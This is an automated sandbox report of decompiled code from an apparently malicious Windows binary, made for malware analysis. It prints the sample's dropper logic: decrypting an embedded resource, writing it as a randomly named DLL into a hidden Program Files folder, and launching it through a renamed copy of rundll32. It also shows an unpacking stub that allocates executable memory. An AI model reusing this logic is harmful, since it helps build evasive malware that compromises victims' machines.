                                                    						_push(0x40);
                                                    						memset( &_v427, 0, _t193 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_v688 = 0;
                                                    						memset( &_v687, 0, 0 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_v40 = 0;
                                                    						asm("stosd");
                                                    						asm("stosd");
                                                    						asm("stosd");
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						E0040107C( &_v40, 5);
                                                    						wsprintfA( &_v428, "d:\\Program Files\\%s",  &_v40);
                                                    						_t247 = _t244 + 0x2c;
                                                    						_t124 = CreateDirectoryA( &_v428, 0); // executed
                                                    						if(_t124 == 0) {
                                                    							wsprintfA( &_v428, "c:\\Program Files\\%s",  &_v40);
                                                    							_t247 = _t247 + 0xc;
                                                    							CreateDirectoryA( &_v428, 0); // executed
                                                    						}
                                                    						Sleep(0x64); // executed
                                                    						SetFileAttributesA( &_v428, 2); // executed
                                                    						memset( &_v40, 0, 0x10);
                                                    						E0040107C( &_v40, 5);
                                                    						wsprintfA( &_v688, "%s\\%s.dll",  &_v428,  &_v40);
                                                    						_t136 = CreateFileA( &_v688, 0x40000000, 2, 0, 2, 0x80, 0); // executed
                                                    						_v44 = _t136;
                                                    						WriteFile(_t136, _t238, _v8,  &_v24, 0); // executed
                                                    						_t138 = rand();
                                                    						asm("cdq");
                                                    						_t139 = _t138 / 0xff;
                                                    						_t214 = _t138 % 0xff;
                                                    						_push(_t214);
                                                    						_v20 = _t214;
                                                    						L004151F6();
                                                    						_v48 = _t139;
                                                    						_t200 = _v20;
                                                    						if(_t200 <= 0) {
                                                    							L16:
                                                    							_t240 = _v44;
                                                    							WriteFile(_t240, _v48, _v20,  &_v24, 0); // executed
                                                    							SetFilePointer(_t240, 0, 0, 0); // executed
                                                    							WriteFile(_t240, "MZ", 2,  &_v24, 0); // executed
                                                    							FindCloseChangeNotification(_t240); // executed
                                                    							_t201 = 8;
                                                    							memcpy( &_v168, "c:\\windows\\system32\\rundll32.exe", _t201 << 2);
                                                    							asm("movsw");
                                                    							_push(0x40);
                                                    							_v948 = 0;
                                                    							memset( &_v947, 0, 0 << 2);
                                                    							asm("stosw");
                                                    							asm("stosb");
                                                    							memset( &_v40, 0, 0x10);
                                                    							E0040107C( &_v40, 3);
                                                    							wsprintfA( &_v948, "%s\\%s.exe",  &_v428,  &_v40);
                                                    							CopyFileA( &_v168,  &_v948, 0); // executed
                                                    							_t205 = 0x7f;
                                                    							_v1720 = 0;
                                                    							_push(0x40);
                                                    							memset( &_v1719, 0, _t205 << 2);
                                                    							asm("stosw");
                                                    							asm("stosb");
                                                    							_v1208 = 0;
                                                    							memset( &_v1207, 0, 0 << 2);
                                                    							asm("stosw");
                                                    							asm("stosb");
                                                    							GetModuleFileNameA(0,  &_v1208, 0x104);
                                                    							wsprintfA( &_v1720, "%s \"%s\",Hlink %s",  &_v948,  &_v688,  &_v1208);
                                                    							_t209 = 0x10;
                                                    							memset( &(_v116.lpReserved), 0, _t209 << 2);
                                                    							_v116.cb = 0x44;
                                                    							_v116.lpDesktop = "WinSta0\\Default";
                                                    							_v116.wShowWindow = 0;
                                                    							CreateProcessA(0,  &_v1720, 0, 0, 0, 0, 0, 0,  &_v116,  &_v132); // executed
                                                    							_t177 = 1;
                                                    							return _t177;
                                                    						} else {
                                                    							_v12 = 0xfa;
                                                    							_v8 = _t139;
                                                    							_v12 = _v12 - _t139;
                                                    							_v16 = _t200;
                                                    							do {
                                                    								_t178 = rand();
                                                    								asm("cdq");
                                                    								_v8 = _v8 + 1;
                                                    								_t67 =  &_v16;
                                                    								 *_t67 = _v16 - 1;
                                                    								 *_v8 = _t178 % (_v12 + _v8);
                                                    							} while ( *_t67 != 0);
                                                    							goto L16;
                                                    						}
                                                    					} else {
                                                    						goto L4;
                                                    					}
                                                    					do {
                                                    						L4:
                                                    						asm("cdq");
                                                    						_t213 = 3;
                                                    						_t217 = _t219 % _t213;
                                                    						if(_t217 == 2) {
                                                    							 *((intOrPtr*)(_t238 + _t219)) =  *((intOrPtr*)(_t238 + _t219)) - _v16;
                                                    						}
                                                    						if(_t217 == 1) {
                                                    							 *((intOrPtr*)(_t238 + _t219)) =  *((intOrPtr*)(_t238 + _t219)) - _v12;
                                                    						}
                                                    						if(_t217 == 0) {
                                                    							 *((intOrPtr*)(_t238 + _t219)) =  *((intOrPtr*)(_t238 + _t219)) - _v12 + _v16;
                                                    						}
                                                    						_t219 = _t219 + 1;
                                                    					} while (_t219 < _v8);
                                                    					goto L11;
                                                    				}
                                                    				goto L2;
                                                    			}

                                                    APIs
                                                    • FindResourceA.KERNEL32(00000000,00000082,GUI), ref: 004013D5
                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 004013E3
                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 004013F8
                                                    • LockResource.KERNEL32(00000000,00000000), ref: 00401403
                                                    • memcpy.MSVCRT ref: 0040140B
                                                    • wsprintfA.USER32 ref: 004014B3
                                                    • CreateDirectoryA.KERNELBASE(?,00000000), ref: 004014C0
                                                    • wsprintfA.USER32 ref: 004014DA
                                                    • CreateDirectoryA.KERNELBASE(?,00000000), ref: 004014E7
                                                    • Sleep.KERNELBASE(00000064), ref: 004014EF
                                                    • SetFileAttributesA.KERNELBASE(?,00000002), ref: 004014FE
                                                    • memset.MSVCRT ref: 0040150B
                                                      • Part of subcall function 0040107C: GetTickCount.KERNEL32 ref: 00401095
                                                      • Part of subcall function 0040107C: srand.MSVCRT ref: 0040109C
                                                      • Part of subcall function 0040107C: rand.MSVCRT ref: 004010A9
                                                      • Part of subcall function 0040107C: rand.MSVCRT ref: 004010C1
                                                    • wsprintfA.USER32 ref: 00401532
                                                    • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040154E
                                                    • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00401567
                                                    • rand.MSVCRT ref: 0040156F
                                                    • rand.MSVCRT ref: 0040159D
                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 004015C6
                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 004015CC
                                                    • WriteFile.KERNELBASE(?,0041C0C8,00000002,?,00000000), ref: 004015DF
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 004015E2
                                                    • memset.MSVCRT ref: 00401617
                                                    • wsprintfA.USER32 ref: 00401644
                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 00401658
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00401697
                                                    • wsprintfA.USER32 ref: 004016BE
                                                    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004016F5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: File$wsprintf$CreateResourcerand$Write$DirectoryFindmemset$AttributesChangeCloseCopyCountLoadLockModuleNameNotificationPointerProcessSizeofSleepTickmemcpysrand
                                                    • String ID: %s "%s",Hlink %s$%s\%s.dll$%s\%s.exe$D$GUI$WinSta0\Default$c:\Program Files\%s$c:\windows\system32\rundll32.exe$d:\Program Files\%s
                                                    • API String ID: 2442594006-826311432
                                                    • Opcode ID: 37b89522606a2c4a54853edb22f9fa52fe1b2d11cf8f40d47bde4dae3510350d
                                                    • Instruction ID: ac8b8aeebc4711bad355f370068009a7f956b33eb2c00d030ca5656be22452af
                                                    • Opcode Fuzzy Hash: 37b89522606a2c4a54853edb22f9fa52fe1b2d11cf8f40d47bde4dae3510350d
                                                    • Instruction Fuzzy Hash: 5DA18DB2A4021CBFDB11DBA4CD85EDEBBBCAB48304F1044A6F245B7191DA749F848B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 46%
                                                    			E00415410(void* __ebx, void* __edi, void* __esi) {
                                                    				CHAR* _v8;
                                                    				intOrPtr* _v24;
                                                    				intOrPtr _v28;
                                                    				struct _STARTUPINFOA _v96;
                                                    				char _v100;
                                                    				char _v104;
                                                    				int _v108;
                                                    				char _v112;
                                                    				char _v116;
                                                    				intOrPtr* _v120;
                                                    				intOrPtr _v124;
                                                    				intOrPtr* _t23;
                                                    				intOrPtr* _t24;
                                                    				intOrPtr* _t25;
                                                    				void* _t27;
                                                    				char _t29;
                                                    				intOrPtr* _t35;
                                                    				intOrPtr _t36;
                                                    				signed int _t38;
                                                    				int _t40;
                                                    				intOrPtr* _t41;
                                                    				intOrPtr _t42;
                                                    				intOrPtr _t46;
                                                    				intOrPtr _t47;
                                                    				intOrPtr _t49;
                                                    				intOrPtr* _t55;
                                                    				void* _t56;
                                                    				intOrPtr _t58;
                                                    				intOrPtr _t61;
                                                    
                                                    				 *[fs:0x0] = _t58;
                                                    				_v28 = _t58 - 0x68;
                                                    				_v8 = 0;
                                                    				 *0x4172ec(2, __edi, __esi, __ebx,  *[fs:0x0], 0x415404, 0x419100, 0xffffffff, _t56);
                                                    				 *0x41cbe0 =  *0x41cbe0 | 0xffffffff;
                                                    				 *0x41cbe4 =  *0x41cbe4 | 0xffffffff;
                                                    				_t23 =  *0x4172f0();
                                                    				_t46 =  *0x41c9b8; // 0x0
                                                    				 *_t23 = _t46;
                                                    				_t24 =  *0x4172f4();
                                                    				_t47 =  *0x41c9b4; // 0x0
                                                    				 *_t24 = _t47;
                                                    				_t25 =  *0x4172fc; // 0x74896be4
                                                    				 *0x41cbdc =  *_t25;
                                                    				_t27 = E0041559B( *_t25);
                                                    				_t61 =  *0x41c8c8; // 0x1
                                                    				if(_t61 == 0) {
                                                    					_t27 =  *0x4172e4(E00415598);
                                                    				}
                                                    				E00415586(_t27);
                                                    				L00415580();
                                                    				_t29 =  *0x41c9b0; // 0x0
                                                    				_v112 = _t29;
                                                    				 *0x4172dc( &_v100,  &_v116,  &_v104,  *0x41c9ac,  &_v112, 0x41c028, 0x41c02c);
                                                    				_push(0x41c024);
                                                    				_push(0x41c000); // executed
                                                    				L00415580(); // executed
                                                    				_t35 =  *0x4172d8; // 0x74895b9c
                                                    				_t55 =  *_t35;
                                                    				_v120 = _t55;
                                                    				if( *_t55 != 0x22) {
                                                    					while( *_t55 > 0x20) {
                                                    						_t55 = _t55 + 1;
                                                    						_v120 = _t55;
                                                    					}
                                                    				} else {
                                                    					do {
                                                    						_t55 = _t55 + 1;
                                                    						_v120 = _t55;
                                                    						_t42 =  *_t55;
                                                    					} while (_t42 != 0 && _t42 != 0x22);
                                                    					if( *_t55 == 0x22) {
                                                    						L6:
                                                    						_t55 = _t55 + 1;
                                                    						_v120 = _t55;
                                                    					}
                                                    				}
                                                    				_t36 =  *_t55;
                                                    				if(_t36 != 0 && _t36 <= 0x20) {
                                                    					goto L6;
                                                    				}
                                                    				_v96.dwFlags = 0;
                                                    				GetStartupInfoA( &_v96);
                                                    				if((_v96.dwFlags & 0x00000001) == 0) {
                                                    					_t38 = 0xa;
                                                    				} else {
                                                    					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                    				}
                                                    				_t40 = E004155C6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
                                                    				_v108 = _t40;
                                                    				exit(_t40);
                                                    				_t41 = _v24;
                                                    				_t49 =  *((intOrPtr*)( *_t41));
                                                    				_v124 = _t49;
                                                    				_push(_t41);
                                                    				_push(_t49);
                                                    				L0041557A();
                                                    				return _t41;
                                                    			}

































                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                    • String ID:
                                                    • API String ID: 801014965-0
                                                    • Opcode ID: dc342064fc473dd6211d3b0943abf782a1a2789885f7a3c13764eacea4c338bf
                                                    • Instruction ID: c74af80d35e2c67a5f516f5a1d0bf5d206878bc3e350f766078b7051b9745e2e
                                                    • Opcode Fuzzy Hash: dc342064fc473dd6211d3b0943abf782a1a2789885f7a3c13764eacea4c338bf
                                                    • Instruction Fuzzy Hash: 4141ACB1984744EFDB20DFA4DC85AEA7BBAEB48710F20416BF441972A1C7785881CB18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 70%
                                                    			E004013B9() {
                                                    				long _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				long _v20;
                                                    				long _v24;
                                                    				void* _v39;
                                                    				void _v40;
                                                    				void* _v44;
                                                    				void* _v48;
                                                    				struct _STARTUPINFOA _v116;
                                                    				struct _PROCESS_INFORMATION _v132;
                                                    				char _v168;
                                                    				void _v427;
                                                    				char _v428;
                                                    				void _v687;
                                                    				char _v688;
                                                    				void _v947;
                                                    				char _v948;
                                                    				void _v1207;
                                                    				char _v1208;
                                                    				void _v1719;
                                                    				char _v1720;
                                                    				struct HRSRC__* _t105;
                                                    				int _t108;
                                                    				int _t124;
                                                    				void* _t136;
                                                    				signed int _t138;
                                                    				signed int _t139;
                                                    				signed int _t177;
                                                    				signed int _t194;
                                                    				signed int _t201;
                                                    				signed int _t202;
                                                    				signed int _t206;
                                                    				signed int _t210;
                                                    				signed int _t214;
                                                    				signed int _t215;
                                                    				signed int _t218;
                                                    				struct HRSRC__* _t220;
                                                    				signed int _t222;
                                                    				void* _t243;
                                                    				void* _t245;
                                                    				void* _t251;
                                                    				void* _t252;
                                                    				void* _t254;
                                                    				void* _t257;
                                                    
                                                    				_pop(_t219);
                                                    				_pop(_t241);
                                                    				_pop(_t191);
                                                    				_t252 = _t251 - 0x6b4;
                                                    				_t105 = FindResourceA(0, 0x82, "GUI"); // executed
                                                    				_t220 = _t105;
                                                    				if(_t220 != 0) {
                                                    					_t243 = LoadResource(0, _t220);
                                                    					if(_t243 != 0) {
                                                    						_t108 = SizeofResource(0, _t220);
                                                    						_v8 = _t108;
                                                    						memcpy(_t243, LockResource(_t243), _t108);
                                                    						_v16 =  *_t243 & 0x000000ff;
                                                    						_t254 = _t252 + 0xc;
                                                    						_t222 = 0;
                                                    						_v12 =  *(_t243 + 1) & 0x000000ff;
                                                    						if(_v8 > 0) {
                                                    							do {
                                                    								asm("cdq");
                                                    								_t214 = 3;
                                                    								_t218 = _t222 % _t214;
                                                    								if(_t218 == 2) {
                                                    									 *((intOrPtr*)(_t243 + _t222)) =  *((intOrPtr*)(_t243 + _t222)) - _v16;
                                                    								}
                                                    								if(_t218 == 1) {
                                                    									 *((intOrPtr*)(_t243 + _t222)) =  *((intOrPtr*)(_t243 + _t222)) - _v12;
                                                    								}
                                                    								if(_t218 == 0) {
                                                    									 *((intOrPtr*)(_t243 + _t222)) =  *((intOrPtr*)(_t243 + _t222)) - _v12 + _v16;
                                                    								}
                                                    								_t222 = _t222 + 1;
                                                    							} while (_t222 < _v8);
                                                    						}
                                                    						_t194 = 0x40;
                                                    						_v428 = 0;
                                                    						_push(0x40);
                                                    						memset( &_v427, 0, _t194 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_v688 = 0;
                                                    						memset( &_v687, 0, 0 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_v40 = 0;
                                                    						asm("stosd");
                                                    						asm("stosd");
                                                    						asm("stosd");
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						E0040107C( &_v40, 5);
                                                    						wsprintfA( &_v428, "d:\\Program Files\\%s",  &_v40);
                                                    						_t257 = _t254 + 0x2c;
                                                    						_t124 = CreateDirectoryA( &_v428, 0); // executed
                                                    						if(_t124 == 0) {
                                                    							wsprintfA( &_v428, "c:\\Program Files\\%s",  &_v40);
                                                    							_t257 = _t257 + 0xc;
                                                    							CreateDirectoryA( &_v428, 0); // executed
                                                    						}
                                                    						Sleep(0x64); // executed
                                                    						SetFileAttributesA( &_v428, 2); // executed
                                                    						memset( &_v40, 0, 0x10);
                                                    						E0040107C( &_v40, 5);
                                                    						wsprintfA( &_v688, "%s\\%s.dll",  &_v428,  &_v40);
                                                    						_t136 = CreateFileA( &_v688, 0x40000000, 2, 0, 2, 0x80, 0); // executed
                                                    						_v44 = _t136;
                                                    						WriteFile(_t136, _t243, _v8,  &_v24, 0); // executed
                                                    						_t138 = rand();
                                                    						asm("cdq");
                                                    						_t139 = _t138 / 0xff;
                                                    						_t215 = _t138 % 0xff;
                                                    						_push(_t215);
                                                    						_v20 = _t215;
                                                    						L004151F6();
                                                    						_v48 = _t139;
                                                    						_t201 = _v20;
                                                    						if(_t201 > 0) {
                                                    							_v12 = 0xfa;
                                                    							_v8 = _t139;
                                                    							_v12 = _v12 - _t139;
                                                    							_v16 = _t201;
                                                    							do {
                                                    								_t177 = rand();
                                                    								asm("cdq");
                                                    								_v8 = _v8 + 1;
                                                    								_t67 =  &_v16;
                                                    								 *_t67 = _v16 - 1;
                                                    								 *_v8 = _t177 % (_v12 + _v8);
                                                    							} while ( *_t67 != 0);
                                                    						}
                                                    						_t245 = _v44;
                                                    						WriteFile(_t245, _v48, _v20,  &_v24, 0); // executed
                                                    						SetFilePointer(_t245, 0, 0, 0); // executed
                                                    						WriteFile(_t245, "MZ", 2,  &_v24, 0); // executed
                                                    						FindCloseChangeNotification(_t245); // executed
                                                    						_t202 = 8;
                                                    						memcpy( &_v168, "c:\\windows\\system32\\rundll32.exe", _t202 << 2);
                                                    						asm("movsw");
                                                    						_push(0x40);
                                                    						_v948 = 0;
                                                    						memset( &_v947, 0, 0 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						memset( &_v40, 0, 0x10);
                                                    						E0040107C( &_v40, 3);
                                                    						wsprintfA( &_v948, "%s\\%s.exe",  &_v428,  &_v40);
                                                    						CopyFileA( &_v168,  &_v948, 0); // executed
                                                    						_t206 = 0x7f;
                                                    						_v1720 = 0;
                                                    						_push(0x40);
                                                    						memset( &_v1719, 0, _t206 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_v1208 = 0;
                                                    						memset( &_v1207, 0, 0 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						GetModuleFileNameA(0,  &_v1208, 0x104);
                                                    						wsprintfA( &_v1720, "%s \"%s\",Hlink %s",  &_v948,  &_v688,  &_v1208);
                                                    						_t210 = 0x10;
                                                    						memset( &(_v116.lpReserved), 0, _t210 << 2);
                                                    						_v116.cb = 0x44;
                                                    						_v116.lpDesktop = "WinSta0\\Default";
                                                    						_v116.wShowWindow = 0;
                                                    						CreateProcessA(0,  &_v1720, 0, 0, 0, 0, 0, 0,  &_v116,  &_v132); // executed
                                                    						_push(1);
                                                    						_pop(0);
                                                    					} else {
                                                    						goto L3;
                                                    					}
                                                    				}
                                                    				return 0;
                                                    			}

















































                                                    APIs
                                                    • FindResourceA.KERNEL32(00000000,00000082,GUI), ref: 004013D5
                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 004013E3
                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 004013F8
                                                    • LockResource.KERNEL32(00000000,00000000), ref: 00401403
                                                    • memcpy.MSVCRT ref: 0040140B
                                                    • wsprintfA.USER32 ref: 004014B3
                                                    • CreateDirectoryA.KERNELBASE(?,00000000), ref: 004014C0
                                                    • wsprintfA.USER32 ref: 004014DA
                                                    • CreateDirectoryA.KERNELBASE(?,00000000), ref: 004014E7
                                                    • Sleep.KERNELBASE(00000064), ref: 004014EF
                                                    • SetFileAttributesA.KERNELBASE(?,00000002), ref: 004014FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: Resource$CreateDirectorywsprintf$AttributesFileFindLoadLockSizeofSleepmemcpy
                                                    • String ID: GUI
                                                    • API String ID: 3499318318-1113068146
                                                    • Opcode ID: 2935683325844162e8379ffd8f7e88a60ce54dc87666410e4520308ef8b9b360
                                                    • Instruction ID: 7681a7971a44aff1cfd63152e6ce6ab61ae4c3c5426a1299c50ffc8ee6258244
                                                    • Opcode Fuzzy Hash: 2935683325844162e8379ffd8f7e88a60ce54dc87666410e4520308ef8b9b360
                                                    • Instruction Fuzzy Hash: 07E086773443243BD22035BDACCDC973E9CC3C47A6B110837FA03E21D2A8794C4541A8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (figure not reproduced; legend: Executed, Not Executed)
                                                    C-Code - Quality: 16%
                                                    			E004B5DAE(intOrPtr _a32, char _a846, intOrPtr _a2801, intOrPtr _a2805, intOrPtr _a2809, intOrPtr _a2813, intOrPtr _a2817, intOrPtr _a2821, void* _a6897, void* _a6921, intOrPtr _a6929, intOrPtr _a6965, intOrPtr _a6977, char _a6981, char _a6992, char _a7034, char _a7074, char _a7131, intOrPtr _a8349, char _a8369, intOrPtr _a8546, intOrPtr _a9058, intOrPtr _a9791, signed int* _a9795, void* _a9799, char _a9803) {
                                                    				CHAR* _v16;
                                                    				intOrPtr* _v24;
                                                    				struct _STARTUPINFOA _v96;
                                                    				char _v100;
                                                    				char _v104;
                                                    				int _v108;
                                                    				char _v112;
                                                    				char _v116;
                                                    				intOrPtr* _v120;
                                                    				intOrPtr _v124;
                                                    				intOrPtr* _t96;
                                                    				void* _t100;
                                                    				signed int* _t102;
                                                    				void* _t104;
                                                    				intOrPtr _t107;
                                                    				void* _t109;
                                                    				void* _t112;
                                                    				signed int* _t118;
                                                    				signed int _t120;
                                                    				void* _t121;
                                                    				char* _t122;
                                                    				signed int _t123;
                                                    				void* _t126;
                                                    				intOrPtr* _t132;
                                                    				intOrPtr* _t133;
                                                    				intOrPtr* _t134;
                                                    				void* _t136;
                                                    				char _t138;
                                                    				intOrPtr* _t144;
                                                    				intOrPtr _t145;
                                                    				signed int _t147;
                                                    				int _t149;
                                                    				intOrPtr* _t150;
                                                    				intOrPtr _t151;
                                                    				void* _t155;
                                                    				intOrPtr* _t156;
                                                    				intOrPtr* _t157;
                                                    				intOrPtr _t165;
                                                    				intOrPtr _t166;
                                                    				intOrPtr _t168;
                                                    				CHAR* _t175;
                                                    				signed int _t176;
                                                    				void* _t177;
                                                    				void* _t178;
                                                    				void* _t179;
                                                    				char* _t180;
                                                    				intOrPtr* _t181;
                                                    				intOrPtr* _t182;
                                                    				void* _t183;
                                                    				signed int* _t185;
                                                    				intOrPtr* _t186;
                                                    				intOrPtr _t188;
                                                    				intOrPtr* _t190;
                                                    				intOrPtr _t191;
                                                    				intOrPtr _t204;
                                                    
                                                    				_t188 =  *_t190;
                                                    				_t191 = _t190 + 4;
                                                    				_t180 =  &_a9803;
                                                    				_t156 =  &_a846;
                                                    				_t175 = 0;
                                                    				E004B6059(0, _t180);
                                                    				_a6897 = VirtualAlloc(0, 0xc2000, 0x1000, 0x40);
                                                    				while( *((intOrPtr*)(_t175 + _t180)) != 0) {
                                                    					asm("pushad");
                                                    					_t96 =  *_t156( *((intOrPtr*)(_t175 + _t180 + 4)),  *((intOrPtr*)(_t175 + _t180)), _a6897);
                                                    					asm("popad");
                                                    					_t175 = _t175 + 8;
                                                    				}
                                                    				_t31 = _t180 + 4; // 0x4
                                                    				_t181 = _t175 + _t31;
                                                    				if(_a9058 != 1) {
                                                    					_t182 = _t181 + 8;
                                                    				} else {
                                                    					_t179 = 0;
                                                    					asm("pushad");
                                                    					while(1) {
                                                    						_t179 = _t179;
                                                    						if(_t179 != 0) {
                                                    							break;
                                                    						}
                                                    						_t156 =  *((intOrPtr*)(_t181 + 4));
                                                    						_t155 = E004B6041( *_t181, _t156);
                                                    						_push( &_a8369);
                                                    						if( *((intOrPtr*)(_t181 + 8)) != 0) {
                                                    							_push(0x40);
                                                    						} else {
                                                    							_push(0x20);
                                                    						}
                                                    						_t96 = _a2817(_t156, _t155);
                                                    						_t181 = _t181 + 0xc;
                                                    						if( *_t181 == 0xffffffff) {
                                                    							_t179 = _t179 + 1;
                                                    						}
                                                    					}
                                                    					_a32 = _t181 + 4;
                                                    					asm("popad");
                                                    					_t182 = _t96;
                                                    				}
                                                    				_a6929 =  *_t182;
                                                    				_t183 = _t182 + 4;
                                                    				E004B77E1(_t183);
                                                    				_a9799 = VirtualAlloc(0, 0xbbc, 0x1000, 0x40);
                                                    				_t157 = _t156;
                                                    				asm("pushad");
                                                    				_t100 =  *_t157(_a9799, _t183 + 4, _a6897);
                                                    				asm("popad");
                                                    				E004B7114(_t100);
                                                    				if(_a8546 != 0 && _a8349 != 0) {
                                                    					E004B73CF();
                                                    					E004B726C();
                                                    				}
                                                    				_t185 = _a9799;
                                                    				_t102 = _t185;
                                                    				while( *_t102 != 1) {
                                                    					_t102 =  &(_t102[0]);
                                                    				}
                                                    				_t176 = _t102[0];
                                                    				_t104 = E004B6025( &(_t102[0]), _t176);
                                                    				_t105 = _t104 + 4;
                                                    				_a9795 = _t104 + 4;
                                                    				while( *_t185 != 1) {
                                                    					E004B6920(_t105);
                                                    					_t107 = _a2821(_t185);
                                                    					if(_t107 == 0) {
                                                    						_t177 = 0;
                                                    						goto L64;
                                                    					} else {
                                                    						_a9791 = _t107;
                                                    						_t118 = _t185;
                                                    						L51:
                                                    						while( *_t118 != 0) {
                                                    							while(1) {
                                                    								_t120 =  *_a9795;
                                                    								if((_t120 & 0x80000000) == 0) {
                                                    									_push(_a9795);
                                                    								} else {
                                                    									_t123 = _t120 ^ 0x80000000;
                                                    									_push(_t123);
                                                    									_a6921 = _t123;
                                                    									 *_a9795 = 0x202020;
                                                    								}
                                                    								_t121 = _a2805(_a9791);
                                                    								if(_t121 == 0) {
                                                    									break;
                                                    								}
                                                    								_a6921 = 0;
                                                    								 *_t176 = _t121;
                                                    								_t176 = _t176 + 4;
                                                    								_t122 = _a9795;
                                                    								while( *_t122 != 0) {
                                                    									_t122 = _t122 + 1;
                                                    								}
                                                    								_t118 = _t122 + 1;
                                                    								_a9795 = _t118;
                                                    								if(( *_t118 & 0x80000000) != 0) {
                                                    									continue;
                                                    								} else {
                                                    									goto L51;
                                                    								}
                                                    								goto L75;
                                                    							}
                                                    							if(_a6921 != 0) {
                                                    								_t177 = 2;
                                                    							} else {
                                                    								_t177 = 1;
                                                    							}
                                                    							L64:
                                                    							_a9799 = _a2809(0, 0x1000, 0x1000, 0x40);
                                                    							_t109 = _a2801( &_a6981);
                                                    							_push(_t109);
                                                    							if(_a6965 == 0xabbc680d) {
                                                    								_push(_a6965);
                                                    								_push(_t109);
                                                    								_a6965 = E004B784E();
                                                    							}
                                                    							_pop(_t110);
                                                    							if(_a6977 == 0xea3af0d7) {
                                                    								_push(_a6977);
                                                    								_a6977 = E004B784E();
                                                    							}
                                                    							_t178 = _t177;
                                                    							if(_t178 != 0) {
                                                    								if(_t178 != 1) {
                                                    									if(_t178 == 2) {
                                                    										_a6977(_a9799,  &_a7131, _a6921, _t185);
                                                    									}
                                                    								} else {
                                                    									_a6977(_a9799,  &_a7074, _a9795, _t185);
                                                    								}
                                                    							} else {
                                                    								_a6977(_a9799,  &_a7034, _t185);
                                                    							}
                                                    							_a6965(0, _a9799,  &_a6992, 0x30);
                                                    							_t112 = _a2813(_a9799, 0x1000, 0x4000);
                                                    							asm("popad");
                                                    							return _t112;
                                                    							goto L75;
                                                    						}
                                                    						while( *_t185 != 0) {
                                                    							_t185 =  &(_t185[0]);
                                                    						}
                                                    						_t185 =  &(_t185[0]);
                                                    						_t176 = _t118[0];
                                                    						_t126 = E004B6025( &(_t118[0]), _t176);
                                                    						_t105 = _t126 + 4;
                                                    						_a9795 = _t126 + 4;
                                                    						continue;
                                                    					}
                                                    					L75:
                                                    				}
                                                    				VirtualFree(_a9799, 0xbbc, 0x4000);
                                                    				VirtualFree(_a6897, 0xc2000, 0x4000);
